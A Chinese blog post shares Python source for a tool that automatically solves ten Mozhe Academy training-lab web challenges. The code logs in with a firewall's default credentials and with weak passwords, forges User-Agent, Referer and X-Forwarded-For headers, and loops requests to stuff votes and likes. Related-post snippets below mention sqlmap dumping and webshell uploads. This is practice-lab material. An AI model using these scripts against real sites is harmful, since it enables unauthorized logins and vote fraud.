墨者学院靶场自动解题

已于 2023-09-22 11:21:46 修改
阅读量343 收藏 3
点赞数 1
分类专栏: Web安全 Python安全 文章标签: web安全 python
于 2023-09-07 15:57:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55733466/article/details/132734059
版权

前言:

墨者学院是一个用于安全学习的网站,其中的在线网络安全攻防技能实训靶场极具特色。

  • 最近做了一下网络安全类的题,但用brupsuit不满足的我决定写一个自动解题的程序

链接:https://pan.baidu.com/s/1yhE5395g12xvkv4F1FGvyA 
提取码:mvjr 

简单演示:

  • 进入一个靶场,并启动环境

  • 启动InsectBaby.exe,并依次填入对应的题号、IP、端口

  • 随后提交输出的key值即可

  • 除了几道靠刷请求的题需要30~60秒,其他的都是秒解,所以在座的速度之王们还在等什么?

  • 如果实在太久,有可能是请求阻塞了,建议重新运行一下程序

源码:

#某防火墙默认口令
def topic_1(ip,port):
    url = "http://{}:{}/login.php".format(ip, port)

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": "53",
        "Origin": "http://{}:{}".format(ip, port),
        "Connection": "close",
        "Referer": "http://{}:{}/login.html".format(ip, port),
        "Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6; verification=89a5b242c7f88765bd270c6cce92328f",
        "Upgrade-Insecure-Requests": "1", }

    # 产品默认口令收集
    data = {'usr': 'useradmin',
            'pwd': 'venus.user',
            'validate': 't2fa',
            'language': '1'}

    response = requests.post(url=url, headers=headers, data=data)

    if response.status_code == 200:
        key = re.findall("KEY:\n\n(.*?)\n\n</p>", response.content.decode("utf-8"))
        return key[0]
    else:
        return

#浏览器信息伪造
def topic_2(ip,port):

    host = "http://{}:{}/".format(ip,port)

    url = host + 'mp_weixin_qq_com.php'

    # 伪造User-Agent
    headers = {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        'Referer': host,
        'Upgrade-Insecure-Requests': '1'}

    response = requests.get(url=url, headers=headers)

    if response.status_code == 200:
        return response.content.decode("utf-8")
    else:
        return

#HTTP动作练习
def topic_3(ip,port):

    get_context_url = "http://{}:{}/".format(ip,port)

    get_key_url = "http://{}:{}/".format(ip,port) + "//info.php"

    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
               'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
               'Accept-Encoding': 'gzip, deflate',
               'Connection': 'close',
               'Referer': 'http://124.70.71.251:46166/',
               'Upgrade-Insecure-Requests': '1', }

    get_context_response = requests.get(url=get_context_url, headers=headers)
    response_txt = get_context_response.content.decode("utf-8")
    soup = BeautifulSoup(response_txt, 'html.parser')

    link_context = soup.select('h4[class="weui_media_title"]')
    link_context2 = str(link_context[0])
    link_context3 = link_context2.replace('<h4 class="weui_media_title"><a href="info.php?content=', '')
    context = link_context3.replace('" style="color: #000">静夜思</a>\n</h4>', '')

    data = {'content': context}
    headers['Content-Type'] = 'application/x-www-form-urlencoded'
    headers['Content-Length'] = '9966'

    #POST的请求体用data来表示
    response = requests.post(url=get_key_url, headers=headers, data=data)

    if response.status_code == 200:
        return response.content.decode("utf-8")
    else:
        return

#热点评论刷分漏洞分析溯源
def topic_4(ip,port):

    url = "http://{}:{}/like_do.php".format(ip, port)

    key_url = "http://{}:{}/news_comment.php".format(ip, port)

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}

    data = {'id': '7'}

    if requests.get(url=key_url, headers=headers).status_code != 200:
        return
    else:
        for i in range(1, 3):

            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
                       "Accept": "application/json, text/javascript, */*; q=0.01",
                       "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                       "Accept-Encoding": "gzip, deflate",
                       "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                       "X-Requested-With": "XMLHttpRequest",
                       "Content-Length": "4",
                       "Origin": "http://{}:{}".format(ip, port),
                       "X-FORWARDED-FOR": "",
                       "Connection": "close",
                       "Referer": key_url}

            for j in range(101, 211):

                headers['X-FORWARDED-FOR'] = '192.168.{}.{}'.format(i, j)

                while True:
                    try:
                        requests.post(url=url, headers=headers, data=data, timeout=(30, 50), verify=False)
                        print("\r正在解题,请耐心等待", end='')
                        break
                    except:
                        print("\r{}".format("●"), end='')
                        time.sleep(5)
                        continue

        headers['X-FORWARDED-FOR'] = '192.168.2.212'

        # 还差一票,超越500
        requests.post(url=url, headers=headers, data=data)

        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}

        response = requests.get(url=key_url, headers=headers)

        key = re.findall("KEY:(.*?)'", response.content.decode("utf-8"))

        return key[0]

#投票常见漏洞分析溯源
def topic_5(ip,port):

    url = "http://{}:{}/wx_vote_do.php".format(ip, port)

    key_url = "http://{}:{}/wx_vote.php".format(ip, port)

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}

    data = {'id': '6'}

    if requests.get(url=key_url, headers=headers).status_code != 200:
        return
    else:
        for i in range(1, 3):
            headers = {
                "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/WIFI",
                "Accept": "application/json, text/javascript, */*; q=0.01",
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                "X-Requested-With": "XMLHttpRequest",
                "Content-Length": "4",
                "Origin": "http://{}:{}".format(ip, port),
                "X-FORWARDED-FOR": "",
                "Connection": "close",
                "Referer": key_url,
                "Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6"}

            for j in range(101, 247):

                headers['X-FORWARDED-FOR'] = '192.168.{}.{}'.format(i, j)

                while True:
                    try:
                        requests.post(url=url, headers=headers, data=data, timeout=(30, 50), verify=False)
                        print("\r正在解题,请耐心等待", end='')
                        break
                    except:
                        print("\r{}".format("●"), end='')
                        time.sleep(5)
                        continue

        headers['X-FORWARDED-FOR'] = '192.168.2.247'
        # 还差一票,获得第一名
        requests.post(url=url, headers=headers, data=data)

        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}

        response = requests.get(url=key_url, headers=headers)

        key = re.findall("key:(.*?)'", response.content.decode("utf-8"))

        return key[0]

#来源页伪造
def topic_6(ip,port):

    url = 'http://{}:{}/x_search_index.php'.format(ip,port)

    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding':'gzip, deflate',
    'Connection':'close',
    'Referer':'http://google.com',  # 伪造referer
    'Upgrade-Insecure-Requests':'1'}

    response = requests.get(url=url,headers=headers)

    if response.status_code == 200:

        key = response.content.decode("utf-8")

        print(key)

        return True

    else:
        return

#投票系统程序设计缺陷分析
def topic_7(ip,port):

    url = "http://{}:{}/vote_do.php".format(ip, port)

    key_url = "http://{}:{}/vote.php".format(ip, port)

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}

    data = {'id': '7'}

    if requests.get(url=key_url, headers=headers).status_code != 200:
        return
    else:
        for i in range(1, 3):

            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
                       "Accept": "application/json, text/javascript, */*; q=0.01",
                       "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                       "Accept-Encoding": "gzip, deflate",
                       "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                       "X-Requested-With": "XMLHttpRequest",
                       "Content-Length": "4",
                       "Origin": "http://{}:{}".format(ip, port),
                       "X-FORWARDED-FOR": "",
                       "Connection": "close",
                       "Referer": key_url}

            for j in range(101, 232):

                headers['X-FORWARDED-FOR'] = '192.168.{}.{}'.format(i, j)

                while True:
                    try:
                        requests.post(url=url, headers=headers, data=data, timeout=(30, 50), verify=False)
                        print("\r正在解题,请耐心等待", end='')
                        break
                    except:
                        print("\r{}".format("●"), end='')
                        time.sleep(5)
                        continue

        headers['X-FORWARDED-FOR'] = '192.168.2.232'

        #还差一票,获得第一名
        requests.post(url=url, headers=headers, data=data)

        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}

        response = requests.get(url=key_url, headers=headers)

        key = re.findall("key:(.*?)'", response.content.decode("utf-8"))

        return key[0]

#IP地址伪造(第1题)
def topic_8(ip,port):
    url = "http://{}:{}/login.php".format(ip, port)

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
               "Accept-Encoding": "gzip, deflate",
               "Content-Type": "application/x-www-form-urlencoded",
               "Content-Length": "43",
               "Origin": "http://{}:{}".format(ip, port),
               "X-FORWARDED-FOR": "127.0.0.1",
               "Connection": "close",
               "Referer": "http://{}:{}/".format(ip, port),
               "Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6",
               "Upgrade-Insecure-Requests": "1"}

    #产品默认口令收集
    data = {'action': 'login',
            'user_name': 'admin',
            'Password': 'admin'}

    response = requests.post(url=url, headers=headers, data=data)

    if response.status_code == 200:
        key = response.content.decode('utf-8')
        print(key)
        return True
    else:
        return

#IP地址伪造(第2题)
def topic_9(ip,port):
    url = 'http://{}:{}/login.php'.format(ip, port)

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
               "Accept-Encoding": "gzip, deflate",
               "Content-Type": "application/x-www-form-urlencoded",
               "Content-Length": "41",
               "Origin": "http://{}:{}".format(ip, port),
               "X-FORWARDED-FOR": "59.125.39.5",
               "Connection": "close",
               "Referer": "http://{}:{}/".format(ip, port),
               "Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6",
               "Upgrade-Insecure-Requests": "1", }

    #Burp实战中,使用弱口令爆破
    data = {'action': 'login',
            'user_name': 'test',
            'Password': 'test'}

    response = requests.post(url=url, headers=headers, data=data)

    if response.status_code == 200:
        key = response.content.decode('utf-8')
        print(key)
        return True
    else:
        return

#服务器返回数据查看
def topic_10(ip,port):
    url = "http://{}:{}/".format(ip, port)

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
               "Accept-Encoding": "gzip, deflate",
               "Content-Type": "application/x-www-form-urlencoded",
               "Content-Length": "13",
               "Origin": "http://{}:{}".format(ip, port),
               "Connection": "close",
               "Referer": "http://{}:{}/".format(ip, port),
               "Upgrade-Insecure-Requests": "1"}

    data = {'boolean': 'false'}

    response = requests.post(url=url, headers=headers, data=data)

    if response.status_code == 200:
        key = response.headers['key']
        return key
    else:
        return

彩虹码
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院靶场练习
cndydmz的博客
12-06 1288
1.SQL注入漏洞测试(布尔盲注) 首先进入靶场, 然后点击上图通知,进入 然后打开sqlmap 输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db 获取数据库名 得到数据库名为stormgroup 然后输入sqlmap -u http://219.153.49.228:45907/new_list.php...
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4087
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
墨者学院(POST注入)
2301_77578012的博客
05-19 422
使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具。发现存在注入点,并且给出了我们具体执行的payload格式。(如果大家对工具有需求的话可以q我哈)参数后所跟数据也可以通过抓包获取。1.墨者靶场(POST注入)2.sqlmap工具(主要)3.burpsuite工具。,在需要测试参数后加。
墨者学院-XWAY科技管理系统V3.0
lianliandad的博客
09-15 3316
妙啊
记在墨者学院业务逻辑漏洞靶场实战感受
weixin_50146421的博客
06-10 740
思路:观察第一个页面需要重置171手机号密码,第二个页面中有四个输入表单,未知的是验证码,所以从验证码下手,在一个看说明,即188手机号已经注册,也就是188可以收到验证码,那么可不可以直接用188手机号获取到验证码,然后用来给171重置密码呢?思路:可以观察余额为1,书的价格超出预算,可以拿bp抓包,然后修改书的价格,达成0元购买,观察bi11和bi22参数分别为10 20 ,对应书的价格,将其改为0,然后放行数据包 即可找到key。防止在登录页面,注册页面,密码修改页面等出现逻辑错误。
墨者学院WebShell文件上传漏洞分析溯源(第2题)
m0_66835614的博客
11-28 1193
墨者学院WebShell文件上传漏洞分析溯源(第2题)
墨者学院—网络安全篇1
博客
09-16 215
题目目录某防火墙默认口令浏览器信息伪造 某防火墙默认口令 背景介绍 安全工程师"墨者"对某公司进行授权测试时,扫描公网IP时发现当前公司在网络边界部署了某型号防火墙,并且公网可以访问防火墙的WEB页面。 实训目标 1、掌握查看当前设备类型的方法; 2、了解网络(安全)设备的登录控制方式; 3、了解网络(安全)设备的默认口令获取方式; 4、了解当前型号防火墙的不同账户的区别; 5、了解在网络信息安全中的权限最小化、权限分离作用; 解题方向 找到防火墙的默认口令进行登录。 解题思路 开启靶场环境 查看源代码
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 3.7(更新)
11-03
1、墨者革离术 运用了墨者研发的新技术,结合权限管理的功能,有效防止防火墙和杀毒软件尚未识别的安全危险入侵,并在病毒库反应前把系统与安全隐患完全隔离,有效防止木马盗号等。...3、完善自动更新的功能
墨者安全专家
07-04
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者学院—网络安全篇3
博客
09-17 1492
文章目录投票常见漏洞分析溯源标题 投票常见漏洞分析溯源 背景介绍 小墨在微信群里面收到一个关于“家乡美”最美乡村评选微信投票,小墨想让自己的家乡成为第一名 实训目标 1、User-Agent的理解 2、X-Forwarded-for的理解 3、使用BurpSuite工具修改内容 解题方向 根据页面提示,进行投票测试 解题步骤 首先开启靶场环境 点击进入微信投票,根据提示 我们需要把a2019的票数刷到第一名 提示要用微信打开 我们使用浏览器信息伪造 标题 ...
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 393
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
墨者学院--SQL注入实战(防注入)-Access(菜刀连接超时问题)
weixin_43071873的博客
09-20 899
进入靶场,测试一下,输入and 1=1 ,提示操作被记录 数据被直接保存在数据库,可以考虑直接把一句话木马传上去 直接传,发现一句话木马没被传上去, 将木马进行url编码一下传入。 使用御剑查找后台。 上菜刀 PS:这个靶场有点奇怪,插入一句话木马后,用菜刀可能超时连不上,重置缓存也不行,遇到这种情况,可以尝试换个浏览器,换一个新的菜刀,或者换个工具,冰歇啊,蚁剑都可以。也可以参照其他博主在插入一句话时用 and 1=<%eval request(“a”)%>,具体为什么出现这个问题
宽字节注入讲解-墨者学院(SQL注入漏洞测试(宽字节))
T1ngSh0w的博客
09-18 4939
宽字节注入原理讲解+墨者学院(SQL注入漏洞测试(宽字节))题目详解
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4294
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者学院】身份认证失效漏洞实战
weixin_61951055的博客
07-19 1148
墨者学院】身份认证失效漏洞实战——二锅头的博客
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值